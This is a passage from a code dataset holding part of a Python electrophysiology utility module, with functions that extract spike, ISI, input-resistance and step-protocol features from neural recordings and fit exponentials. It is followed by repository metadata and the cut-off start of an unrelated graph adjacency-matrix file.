dataFeat.copy()\n\n\n################################################################################\n## Get Electrophysiology Features from Depolarization Steps Protocol\n################################################################################\ndef getDepolStepsFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose,\n\t\tname='epu.getDepolStepsFeatures.verbose', zero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from DEPOL STEPS PROTOCOL\")\n\n\tdt = deepcopy(infoDict['data']['dt'])\n\n\tdata = data[:, 0].squeeze()\n\n\tdpData, dpIdx, dpI = getDepolIdx(data, hdr, protocol=EPHYS_PROT_DEPOLSTEPS)\n\n\tif verbose > 2:\n\t\tprint(f\"There are {hdr['lActualEpisodes']} episodes!\")\n\n\tfor ii, dpD in enumerate(dpData.T):\n\n\t\tif verbose > 2:\n\t\t\tprint(f\"Extracting features from episode {ii}!\")\n\n\t\tspikeIdx, spikeVals = epo.getSpikeIdx(dpD, dt=dt,\n\t\t\t**infoDict['objectives']['Spikes'])\n\n\t\tfor obj in infoDict['objectives']:\n\n\t\t\tif verbose > 3:\n\t\t\t\tprint(f\"Considering objective {obj}\")\n\n\t\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\t\tif obj == \"ISI\":\n\n\t\t\t\tif subInfo['depol'] in ['thirds', 'lastthird']:\n\t\t\t\t\tbounds = np.linspace(0, len(dpD), 4).astype(int)\n\n\t\t\t\t\terr = []\n\n\t\t\t\t\tif len(spikeIdx) > 0:\n\t\t\t\t\t\tfirst = spikeIdx[spikeIdx < bounds[1]]\n\t\t\t\t\telse:\n\t\t\t\t\t\tfirst = deepcopy(spikeIdx)\n\t\t\t\t\terr.append(epo.getISI(first, dt=dt, **subInfo))\n\n\t\t\t\t\tif len(spikeIdx) > 0:\n\t\t\t\t\t\tlast = spikeIdx[spikeIdx >= bounds[2]]\n\t\t\t\t\telse:\n\t\t\t\t\t\tlast = deepcopy(spikeIdx)\n\t\t\t\t\terr.append(epo.getISI(last, dt=dt, **subInfo))\n\n\t\t\t\t\tif subInfo['depol'] == 'lastthird':\n\t\t\t\t\t\terr = err[-1]\n\n\t\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\t\tprint(f\"ISI = {err:.4g}ms 
(FR = {1/err:.4g}Hz)\")\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\t\tfor e in err:\n\t\t\t\t\t\t\t\tprint(f\"ISI = {e:.4g}ms (FR = {1/e:.4g}Hz)\")\n\n\t\t\t\telse:\n\t\t\t\t\terr = epo.getISI(spikeIdx, dt=dt, **subInfo)\n\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\t\telif obj == 'Amp':\n\t\t\t\terr = epo.getSpikeAmp(spikeIdx, spikeVals, **subInfo)\n\n\t\t\t\tif not isinstance(err, float):\n\t\t\t\t\terr = err[1]\n\n\t\t\t\tif verbose > 2:\n\t\t\t\t\tprint(f\"Amp = {err:.4g}mV\")\n\n\t\t\telif obj == 'PSD':\n\t\t\t\terr = epo.getPSD(dpD, spikeIdx, dt=dt, **subInfo)\n\n\t\t\t\tif not isinstance(err, float):\n\t\t\t\t\terr = err[1]\n\n\t\t\t\tif verbose > 2:\n\t\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\t\telse:\n\t\t\t\tcontinue\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj] = {}\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]['depol']\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj]['depol'] = {}\n\n\t\t\tif key is not None:\n\t\t\t\tkey = utl.force_pos_int(key, name='epu.getDepolStepsFeats.key',\n\t\t\t\t\tzero_ok=True, verbose=verbose)\n\t\t\telse:\n\t\t\t\tkey = list(out[obj]['depol'].keys()).sort().pop() + 1\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]['depol'][key]\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj]['depol'][key] = {}\n\n\t\t\tdataFeat[obj]['depol'][key][dpI[ii]] = deepcopy(err)\n\n\tif \"FI\" in infoDict['objectives'].keys():\n\n\t\terr = epo.getFISlope(dpData, infoDict['objectives'], dpI, dt=dt,\n\t\t\treturnAll=False)\n\n\t\tif verbose > 2:\n\t\t\tif not isinstance(err, float):\n\t\t\t\tfor e in err:\n\t\t\t\t\tprint(f\"F-I Slope = {e:.4g}Hz/pA\")\n\t\t\telse:\n\t\t\t\tprint(f\"F-I Slope = {err:.4g}Hz/pA\")\n\n\t\ttry:\n\t\t\t_ = dataFeat['FI']\n\t\texcept KeyError:\n\t\t\tdataFeat['FI'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getDepolStepsFeats.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(out['FI'].keys()).sort().pop() + 1\n\n\t\ttry:\n\t\t\t_ = dataFeat['FI'][key]\n\t\texcept KeyError:\n\t\t\tdataFeat['FI'][key] = {}\n\n\t\tdataFeat['FI'][key] = deepcopy(err)\n\n\treturn dataFeat\n\n\n################################################################################\n## Get Electrophysiology Features from Hyperpolarization Steps Protocol\n################################################################################\ndef getHyperpolStepsFeatures(data, hdr, infoDict, dataFeat, key=None,\n\tverbose=0):\n\n\tverbose = utl.force_pos_int(verbose,\n\t\tname='epu.getHyperpolStepsFeatures.verbose', zero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from HYPERPOL STEPS PROTOCOL\")\n\n\tdt = deepcopy(infoDict['data']['dt'])\n\n\tdata = data[:, 0].squeeze()\n\n\thpData, hpIdx, hpI = getHyperpolIdx(data, hdr,\n\t\tprotocol=EPHYS_PROT_HYPERPOLSTEPS)\n\n\tif verbose > 2:\n\t\tprint(f\"There are {hdr['lActualEpisodes']} episodes!\")\n\n\n\tfor ii, hpD in enumerate(hpData.T):\n\n\t\tif verbose > 2:\n\t\t\tprint(f\"Extracting features from episode {ii}!\")\n\n\t\tspikeIdx, spikeVals = epo.getSpikeIdx(hpD, dt=dt,\n\t\t\t**infoDict['objectives']['Spikes'])\n\n\t\tfor obj in infoDict['objectives']:\n\n\t\t\tif verbose > 3:\n\t\t\t\tprint(f\"Considering objective {obj}\")\n\n\t\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\t\tif obj == \"PSD\":\n\t\t\t\terr = epo.getPSD(hpD, spikeIdx, dt=dt, **subInfo)\n\n\t\t\t\tif not isinstance(err, float):\n\t\t\t\t\terr = err[1]\n\n\t\t\t\tif verbose > 
2:\n\t\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\t\telse:\n\t\t\t\tcontinue\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj] = {}\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]['hyperpol']\n\t\t\texcept:\n\t\t\t\tdataFeat[obj]['hyperpol'] = {}\n\n\t\t\tif key is not None:\n\t\t\t\tkey = utl.force_pos_int(key, name='epu.getHyperpolFeatures.key',\n\t\t\t\t\tzero_ok=True, verbose=verbose)\n\t\t\telse:\n\t\t\t\tkey = list(out[obj]['hyperpol'].keys()).sort().pop() + 1\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]['hyperpol'][key]\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj]['hyperpol'][key] = {}\n\n\t\t\tdataFeat[obj]['hyperpol'][key][hpI[ii]] = deepcopy(err)\n\n\tif \"RI\" in infoDict['objectives'].keys():\n\n\t\terr = epo.getInputResistance(hpData, infoDict['objectives'], hpI,\n\t\t\tdt=dt, **infoDict['objectives']['RI'])\n\n\t\tif isinstance(err, dict):\n\t\t\tRIerr = err['linFitP'][0]\n\n\t\tif verbose > 2:\n\t\t\tprint(f\"Input Resistance = {err:.4g} GOhms\")\n\n\t\ttry:\n\t\t\t_ = dataFeat['RI']\n\t\texcept KeyError:\n\t\t\tdataFeat['RI'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getHyperpolStepsFeats.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(out['RI'].keys()).sort().pop() + 1\n\n\t\ttry:\n\t\t\t_ = dataFeat['RI'][key]\n\t\texcept KeyError:\n\t\t\tdataFeat['RI'][key] = {}\n\n\t\t# print(dataFeat['RI'], key, dataFeat['RI'][key])\n\n\t\tdataFeat['RI'][key] = deepcopy(RIerr)\n\n\t\tif infoDict['objectives']['RI']['estTau']:\n\t\t\ttry:\n\t\t\t\t_ = dataFeat['tau']\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat['tau'] = {}\n\n\t\t\tif isinstance(err, dict):\n\t\t\t\ttauErr = err['tau']\n\t\t\telse:\n\t\t\t\ttauErr = np.nan\n\n\t\t\tdataFeat['tau'][key] = deepcopy(tauErr)\n\n\t\tif infoDict['objectives']['RI']['estC']:\n\t\t\ttry:\n\t\t\t\t_ = dataFeat['C']\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat['C'] = {}\n\n\t\t\tif isinstance(err, dict):\n\t\t\t\tCErr = err['C']\n\t\t\telse:\n\t\t\t\tCErr = np.nan\n\n\t\t\tdataFeat['C'][key] = deepcopy(CErr)\n\n\treturn dataFeat\n\n\n################################################################################\n## Get Electrophysiology Features from Constant Holding Protocol\n################################################################################\ndef getConstHoldFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose,\n\t\tname='epu.getConstHoldFeatures.verbose', zero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from CONSTANT HOLD PROTOCOL\")\n\n\tif hdr['lActualEpisodes'] > 1:\n\t\tif verbose:\n\t\t\tprint(\"WARNING: At this time, we cannot handle multi-episode hold\"\n\t\t\t\t\"ing current protocols (non-rest + no current-injection).\")\n\t\treturn dataFeat\n\n\tdata = data[:, 0].squeeze()\n\n\t## For const hold protocols, want to make spikes are larger than noise\n\tholdData = data[:int(abf.GetHoldingDuration(hdr)/hdr['nADCNumChannels'])]\n\tspikeDict = infoDict['objectives']['Spikes'].copy()\n\n\tspikeIdx, spikeVals = epo.getSpikeIdx(data, dt=infoDict['data']['dt'],\n\t\t**spikeDict)\n\n\tfor obj in infoDict['objectives']:\n\n\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\t## For const hold protocols, only want mean fit.\n\t\tsubInfo['fit'] = 'mean'\n\n\t\tif obj == 'ISI':\n\t\t\terr = epo.getISI(spikeIdx, dt=infoDict['data']['dt'],\n\t\t\t\t**subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\telif obj == 'Amp':\n\t\t\terr = 
epo.getSpikeAmp(spikeIdx, spikeVals,\n\t\t\t\tdt=infoDict['data']['dt'], **subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"Amp = {err:.4g}mV\")\n\n\t\telif obj == 'PSD':\n\t\t\terr = epo.getPSD(data, spikeIdx,\n\t\t\t\tdt=infoDict['data']['dt'], **subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\telse:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]\n\t\texcept KeyError:\n\t\t\tdataFeat[obj] = {}\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]['hold']\n\t\texcept KeyError:\n\t\t\tdataFeat[obj]['hold'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getConstHoldFeatures.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(out[obj]['hold'].keys()).sort().pop() + 1\n\n\t\tdataFeat[obj]['hold'][key] = deepcopy(err)\n\n\treturn dataFeat.copy()\n\n\n################################################################################\n################################################################################\n##\n##\t\tElectrophysiology Data Processing Methods\n##\n################################################################################\n################################################################################\n\n\n################################################################################\n## Get Indices, Current of Depolarization Step\n################################################################################\ndef getDepolIdx(data, hdr, protocol=None, verbose=0):\n\t\"\"\"getDepolIdx(data, hdr, protocol=None):\n\n\tGet the section of data, indices, and input current corresponding to a\n\tdepolarization step(s) protocol.\n\n\tINPUTS:\n\t=======\n\tdata \t\t(ndarray)\t\tArray containing ephys data to be parsed.\n\n\thdr \t\t(dict)\t\t\tHeader dictionary corresponding to data.\n\n\tprotocol \t(int)\t\t\t(Default: None) integer key indicating the \n\t\t\t\t\t\t\t\texperimental protocol used to generate data.\n\t\t\t\t\t\t\t\tWill be inferred from header if not indicated.\n\n\tverbose \t(int)\t\t\t(Default: 0) Flag for verbosity of method.\n\t\t\t\t\t\t\t\tDefault is lowest verbosity.\n\n\tOUTPUTS:\n\t=========\n\tdata \t\t(ndarray)\t\tTruncated data array corresponding to depol \n\t\t\t\t\t\t\t\tstep(s) region.\n\n\tdpIdx \t\t(tuple)\t\t\tTuple of indices indicating where in the data\n\t\t\t\t\t\t\t\tarray the depol step(s) begin and end.\n\n\tdpI \t\t(float, list)\tInput current of depol step(s). If multiple\n\t\t\t\t\t\t\t\tsteps, gives list of currents.\n\t\"\"\"\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getDepolIdx.verbose',\n\t\tzero_ok=True)\n\n\tif protocol is None:\n\t\tprotocol = getExpProtocol(hdr)\n\telse:\n\t\tprotocol = utl.force_int(protocol, name='epu.getHyperpolIdx.verbose',\n\t\t\tverbose=verbose)\n\n\tuDACChan = hdr['nActiveDACChannel']\n\n\tepochIdx = getEpochIdx(hdr)\n\n\t## If not known protocol, raise error\n\tif protocol < 0:\n\t\terr_str = f\"Invalid value for keyword 'protocol'... 
{protocol} \"\n\t\terr_str += \"is not a known ephys protocol.\"\n\t\traise ValueError(err_str)\n\n\telif protocol == EPHYS_PROT_DEPOLSTEP:\n\n\t\terr_str = f\"Input argument 'data' must have 1 dims, got {data.ndim}.\"\n\t\tassert data.ndim == 1, err_str\n\n\t\tif len(np.unique(epochIdx, axis=0)) == 1:\n\t\t\tepochIdx = epochIdx[0]\n\t\telse:\n\t\t\terr_str = \"ERROR: Multiple epoch protocols for DEPOL STEP PROTOCOL!\"\n\t\t\traise ValueError(err_str)\n\n\t\tholdCurr = abf.GetHoldingLevel(hdr, uDACChan, 1)\n\n\t\tepochLevs = hdr['fEpochInitLevel'][uDACChan]\n\t\tepochLevs = epochLevs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\tif len(np.unique(epochLevs)) == 2:\n\t\t\tdpEpchIdx = (epochLevs != holdCurr).nonzero()[0]\n\n\t\t\tdpI = hdr['fEpochInitLevel'][uDACChan][dpEpchIdx]\n\n\t\telse:\n\t\t\tepochIncs = hdr['fEpochLevelInc'][uDACChan]\n\t\t\tepochIncs = epochIncs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\t\tdpEpchIdx = (epochIncs != 0).nonzero()[0]\n\n\t\t\tdpI = hdr['fEpochInitLevel'][uDACChan][dpEpchIdx]\n\t\t\tdpI += hdr['fEpochLevelInc'][uDACChan][dpEpchIdx]\n\n\t\tstartIdx = int(epochIdx[dpEpchIdx+1])\n\t\tendIdx = int(epochIdx[dpEpchIdx+2])\n\t\tdpIdx = (startIdx, endIdx)\n\n\t\tdata = data[startIdx:endIdx]\n\n\t\treturn data, dpIdx, dpI\n\n\telif protocol == EPHYS_PROT_DEPOLSTEPS:\n\n\t\terr_str = f\"Input argument 'data' must have 2 dims, got {data.ndim}.\"\n\t\tassert data.ndim == 2, err_str\n\n\t\tepochLevs = hdr['fEpochInitLevel'][uDACChan]\n\t\tepochLevs = epochLevs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\tif len(np.unique(epochLevs)) == 2:\n\t\t\tdpEpchIdx = (epochLevs != holdCurr).nonzero()[0]\n\n\t\telse:\n\t\t\tepochIncs = hdr['fEpochLevelInc'][uDACChan]\n\t\t\tepochIncs =epochIncs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\t\t\tdpEpchIdx = (epochIncs).nonzero()[0]\n\n\n\t\tif len(np.unique(epochIdx, axis=0)) == 1:\n\t\t\tepochIdx = epochIdx[0]\n\n\t\t\tstartIdx = int(epochIdx[dpEpchIdx+1])\n\t\t\tendIdx = int(epochIdx[dpEpchIdx+2])\n\t\t\tdpIdx = (startIdx, endIdx)\n\n\t\t\tdata = data[startIdx:endIdx]\n\n\t\t\tdpI = []\n\t\t\tfor epNo in range(hdr['lActualEpisodes']):\n\n\t\t\t\ttmpI = hdr['fEpochInitLevel'][uDACChan][dpEpchIdx]\n\t\t\t\ttmpI += epNo*hdr['fEpochLevelInc'][uDACChan][dpEpchIdx]\n\n\t\t\t\tdpI.append(tmpI)\n\n\t\telse:\n\t\t\tdpData, dpIdx, dpI = [], [], []\n\n\t\t\tfor epNo in range(hdr['lActualEpisodes']):\n\n\t\t\t\tstartIdx = int(epochIdx[epNo, dpEpchIdx+1])\n\t\t\t\tendIdx = int(epochIdx[epNo, dpEpchIdx+2])\n\t\t\t\tdpIdx.append((startIdx, endIdx))\n\n\t\t\t\tdpData.append(data[startIdx:endIdx, epNo])\n\n\t\t\t\ttmpI = hdr['fEpochInitLevel'][uDACChan][dpEpchIdx]\n\t\t\t\ttmpI += epNo*hdr['fEpochLevelInc'][uDACChan][dpEpchIdx]\n\n\t\t\t\tdpI.append(tmpI)\n\n\t\t\ttry:\n\t\t\t\tdata = np.array(dpData).astype(float)\n\t\t\texcept:\n\t\t\t\terr_str = f\"Error coercing dpData into np.ndarray... Probably \"\n\t\t\t\terr_str += \"should not allow episodes of different lengths!\"\n\t\t\t\traise ValueError(err_str)\n\n\t\treturn data, dpIdx, np.array(dpI).squeeze()\n\n\telse:\n\t\terr_str = f\"Invalid value for keyword 'protocol'... 
Protocol={protocol}\"\n\t\terr_str += \" is not allowed (only expect depol step(s)).\"\n\t\traise ValueError(err_str)\n\n\n################################################################################\n## Get Indices, Current of Hyperpolarization Step\n################################################################################\ndef getHyperpolIdx(data, hdr, protocol=None, verbose=0):\n\t\"\"\"getHyperpolIdx(data, hdr, protocol=None):\n\n\tGet the section of data, indices, and input current corresponding to a\n\thyperpolarization step(s) protocol.\n\n\tINPUTS:\n\t=======\n\tdata \t\t(ndarray)\t\tArray containing ephys data to be parsed.\n\n\thdr \t\t(dict)\t\t\tHeader dictionary corresponding to data.\n\n\tprotocol \t(int)\t\t\t(Default: None) integer key indicating the \n\t\t\t\t\t\t\t\texperimental protocol used to generate data.\n\t\t\t\t\t\t\t\tWill be inferred from header if not indicated.\n\n\tverbose \t(int)\t\t\t(Default: 0) Flag for verbosity of method.\n\t\t\t\t\t\t\t\tDefault is lowest verbosity.\n\n\tOUTPUTS:\n\t=========\n\tdata \t\t(ndarray)\t\tTruncated data array corresponding to hyperpol \n\t\t\t\t\t\t\t\tstep(s) region.\n\n\thpIdx \t\t(tuple)\t\t\tTuple of indices indicating where in the data\n\t\t\t\t\t\t\t\tarray the hyperpol step(s) begin and end.\n\n\thpI \t\t(float, list)\tInput current of hyperpol step(s). If multiple\n\t\t\t\t\t\t\t\tsteps, gives list of currents.\n\t\"\"\"\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getHyperpolIdx.verbose',\n\t\tzero_ok=True)\n\n\tif protocol is None:\n\t\tprotocol = getExpProtocol(hdr)\n\telse:\n\t\tprotocol = utl.force_int(protocol, name='epu.getHyperpolIdx.verbose',\n\t\t\tverbose=verbose)\n\n\tepochIdx = getEpochIdx(hdr)\n\n\tuDACChan = hdr['nActiveDACChannel']\n\n\t## If not known protocol, raise error\n\tif protocol < 0:\n\t\terr_str = f\"Invalid value for keyword 'protocol'... 
{protocol} \"\n\t\terr_str += \"is not a known ephys protocol.\"\n\t\traise ValueError(err_str)\n\n\telif protocol == EPHYS_PROT_HYPERPOLSTEP:\n\n\t\tif len(np.unique(epochIdx, axis=0)) == 1:\n\t\t\tepochIdx = epochIdx[0]\n\t\telse:\n\t\t\terr_str = \"ERROR: Multiple epoch protocols for HYPERPOL STEP \"\n\t\t\terr_str += \"PROTOCOL!\"\n\t\t\traise ValueError(err_str)\n\n\t\tholdCurr = abf.GetHoldingLevel(hdr, uDACChan, 1)\n\n\t\tepochLevs = hdr['fEpochInitLevel'][uDACChan]\n\t\tepochLevs = epochLevs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\tif len(np.unique(epochLevs)) == 2:\n\t\t\thpEpchIdx = (epochLevs != holdCurr).nonzero()[0]\n\n\t\t\thpI = hdr['fEpochInitLevel'][uDACChan][hpEpchIdx]\n\n\t\telse:\n\t\t\tepochIncs = hdr['fEpochLevelInc'][uDACChan]\n\t\t\tepochIncs =epochIncs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\t\thpEpchIdx = (epochIncs).nonzero()[0]\n\n\t\t\thpI = hdr['fEpochInitLevel'][uDACChan][hpEpchIdx]\n\t\t\thpI += hdr['fEpochLevelInc'][uDACChan][hpEpchIdx]\n\n\t\tstartIdx = int(epochIdx[hpEpchIdx+1])\n\t\tendIdx = int(epochIdx[hpEpchIdx+2])\n\t\thpIdx = (startIdx, endIdx)\n\n\t\tdata = data[startIdx:endIdx]\n\n\t\treturn data, hpIdx, hpI\n\n\n\telif protocol == EPHYS_PROT_HYPERPOLSTEPS:\n\n\t\terr_str = f\"Input argument 'data' must have 2 dims, got {data.ndim}.\"\n\t\tassert data.ndim == 2, err_str\n\t\t\n\t\tholdCurr = abf.GetHoldingLevel(hdr, uDACChan, 1)\n\n\t\tepochLevs = hdr['fEpochInitLevel'][uDACChan]\n\t\tepochLevs = epochLevs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\t# if len(np.unique(epochLevs)) == 2:\n\t\t# \thpEpchIdx = (epochLevs != holdCurr).nonzero()[0]\n\n\t\t# else:\n\t\tepochIncs = hdr['fEpochLevelInc'][uDACChan]\n\t\tepochIncs =epochIncs[(hdr['nEpochType'][uDACChan]).nonzero()]\n\n\t\thpEpchIdx = (epochIncs).nonzero()[0]\n\n\t\tif len(np.unique(epochIdx, axis=0)) == 1:\n\t\t\tepochIdx = epochIdx[0]\n\n\t\t\tstartIdx = int(epochIdx[hpEpchIdx+1])\n\t\t\tendIdx = int(epochIdx[hpEpchIdx+2])\n\t\t\thpIdx = (startIdx, endIdx)\n\n\t\t\tdata = data[startIdx:endIdx]\n\n\t\t\thpI = []\n\t\t\tfor epNo in range(hdr['lActualEpisodes']):\n\n\t\t\t\ttmpI = hdr['fEpochInitLevel'][uDACChan][hpEpchIdx]\n\t\t\t\ttmpI += epNo*hdr['fEpochLevelInc'][uDACChan][hpEpchIdx]\n\n\t\t\t\thpI.append(tmpI)\n\n\t\telse:\n\t\t\thpData, hpIdx, hpI = [], [], []\n\n\t\t\tfor epNo in range(hdr['lActualEpisodes']):\n\n\t\t\t\tstartIdx = int(epochIdx[epNo, hpEpchIdx+1])\n\t\t\t\tendIdx = int(epochIdx[epNo, hpEpchIdx+2])\n\t\t\t\thpIdx.append((startIdx, endIdx))\n\n\t\t\t\thpData.append(data[startIdx:endIdx, epNo])\n\n\t\t\t\ttmpI = hdr['fEpochInitLevel'][uDACChan][hpEpchIdx]\n\t\t\t\ttmpI += epNo*hdr['fEpochLevelInc'][uDACChan][hpEpchIdx]\n\n\t\t\t\thpI.append(tmpI)\n\n\t\t\ttry:\n\t\t\t\tdata = np.array(hpData).astype(float)\n\t\t\texcept:\n\t\t\t\terr_str = f\"Error coercing hpData into np.ndarray... Probably \"\n\t\t\t\terr_str += \"should not allow episodes of different lengths!\"\n\t\t\t\traise ValueError(err_str)\n\n\t\treturn data, hpIdx, np.array(hpI).squeeze()\n\n\telse:\n\t\terr_str = f\"Invalid value for keyword 'protocol'... 
Protocol={protocol}\"\n\t\terr_str += \" is not allowed (only expect depol step(s)).\"\n\t\traise ValueError(err_str)\n\n\n################################################################################\n## Get Rolling Percentile of Data\n################################################################################\ndef getRollPerc(data, window=100, perc=50., verbose=0, edgeCorrect=True):\n\n\t############################################################################\n\t##\tCheck Inputs, Keyword Arguments\n\t############################################################################\n\tif True:\n\n\t\t## Check the verbosity keyword\n\t\tverbose = utl.force_pos_int(verbose, name='epu.getRollPerc.verbose', \n\t\t\tzero_ok=True, verbose=verbose)\n\n\t\t## Check the type and shape of the data\n\t\tdata = utl.force_float_arr(data, name='epu.getRollPerc.data',\n\t\t\tverbose=verbose).squeeze()\n\n\t\terr_str = \"Input argument 'data' must be 1D array.\"\n\t\terr_str += f\" (data.ndim = {data.ndim})\"\n\t\tassert data.ndim == 1, err_str\n\n\t\t## Check that 'window' is an integer and is odd\n\t\twindow = utl.force_pos_int(window, name='epu.getRollPerc.window',\n\t\t\tverbose=verbose)\n\t\twindow = window + 1 if ((window % 2) == 0) else window\n\n\t\tperc = utl.force_pos_float(perc, name=\"epu.getRollPerc.perc\",\n\t\t\tverbose=verbose)\n\t\terrStr = \"Keyword argument 'perc' must be a percentage (0, 100).\"\n\t\tassert perc < 100, errStr\n\n\t\terrStr = \"Keyword argument 'edgeCorrect' must be a boolean.\"\n\t\tassert isinstance(edgeCorrect, bool), errStr\n\n\t############################################################################\n\t##\tCalculate Percentile\n\t############################################################################\n\t\torder = int(window*perc/100.)\n\n\t\t## Get the rolling median\n\t\tmedData = sig.order_filter(data, np.ones(window), order)\n\n\t\tif edgeCorrect:\n\t\t\t## Edge correct the median\n\t\t\twindArr = np.arange(window).astype(int)\n\t\t\toddArr = (windArr + windArr%2. 
+ 1).astype(int)\n\t\t\tleftEnd, rightEnd = [], []\n\t\t\tcounter = 0\n\t\t\tfor (ii, wd) in zip(windArr, oddArr):\n\n\t\t\t\tif verbose >= 3:\n\t\t\t\t\tif (counter + 1) % 20 == 0.:\n\t\t\t\t\t\tprint(f\"{counter+1}/{len(windArr)}: {ii}, {wd}\")\n\t\t\t\t\n\t\t\t\tleftEnd.append(sig.order_filter(data[:window*2], np.ones(wd),\n\t\t\t\t\tint((wd-1)/2))[ii])\n\n\t\t\t\twd = oddArr[-1]-wd+1\n\t\t\t\trightEnd.append(sig.order_filter(data[-window*2-1:],\n\t\t\t\t\tnp.ones(wd), int((wd-1)/2))[-(window-ii)-1])\n\n\t\t\t\tcounter += 1\n\n\t\t\tmedData[:window] = np.array(leftEnd)\n\t\t\tmedData[-window:] = np.array(rightEnd)\n\n\t\t## Get rolling percentile array\n\t\treturn medData\n\n\n################################################################################\n################################################################################\n##\n##\t\tFitting Routines\n##\n################################################################################\n################################################################################\n\n\n################################################################################\n## Fit an Exponential\n################################################################################\ndef fitExp(data, times=None, returnAll=False):\n\n\t## Check that data is floats and 1D\n\tdata = utl.force_float_arr(data).squeeze()\n\n\terr_str = \"(ephys_utl.fitExp): Invalid shape for input argument 'data'; \"\n\terr_str += f\"expected 1D, got {data.shape}\"\n\tassert data.ndim == 1, err_str\n\n\t## Set time grid on which to fit Exp\n\tif times is None:\n\t\ttimes = np.arange(len(data)).astype(float)\n\telse:\n\t\ttimes = utl.force_float_arr(times)\n\n\t## Try and fit the curve!\n\ttry:\n\t## Set initial guess based on data\n\t\tp0 = [\n\t\t\tmax(-150, min(data[0], 100)),\n\t\t\tmax(-150, min(np.mean(data), 100)),\n\t\t\tmax(0, min(len(data)/10., np.inf))\n\t\t]\n\n\t\tlb = [\n\t\t\tmin(-150, data[0]-20),\n\t\t\tmin(-150, data.min() - 30),\n\t\t\t0\n\t\t]\n\n\t\tub = [\n\t\t\tmax(100, data[0]+20),\n\t\t\tmax(100, data.max() + 30),\n\t\t\tnp.inf\n\t\t]\n\n\t\t## Fit the curve with some reasonable bounds\n\t\tparams, cov = curve_fit(offsetExp, times, data, p0=p0, bounds=(lb, ub))\n\t\tcov = np.diag(cov)\n\n\t## If something went wrong, return a really bad result\n\texcept:\n\t\tparams = [-150, -150, 0]\n\t\tcov = [100, 100, 100]\n\n\t## If needed, return everything\n\tif returnAll:\n\t\treturn np.array(params).astype(float), np.array(cov).astype(float)\n\telse:\n\t\treturn np.array(params).astype(float)\n\n\n################################################################################\n## Offset Exponenital Function\n################################################################################\ndef offsetExp(t, V0, VInf, tau):\n\treturn VInf + (V0-VInf)*np.exp(-t/tau)","repo_name":"ejohnson643/MOO_CNM","sub_path":"Objectives/Electrophysiology/ephys_util.py","file_name":"ephys_util.py","file_ext":"py","file_size_in_byte":36793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7704031467","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 1 10:51:19 2020\n\n@author: YuJeong\n\"\"\"\n\n# Adjacency Matrix representation in Python\n\nimport os \nimport copy, random\nimport string\nfrom pathlib import Path\n\nclass Graph(object):\n\n # Initialize the matrix\n def __init__(self, size, index):\n self.adjMatrix = []\n self.index = index\n for i in range(size):\n self.adjMatrix.append([0 for i in 
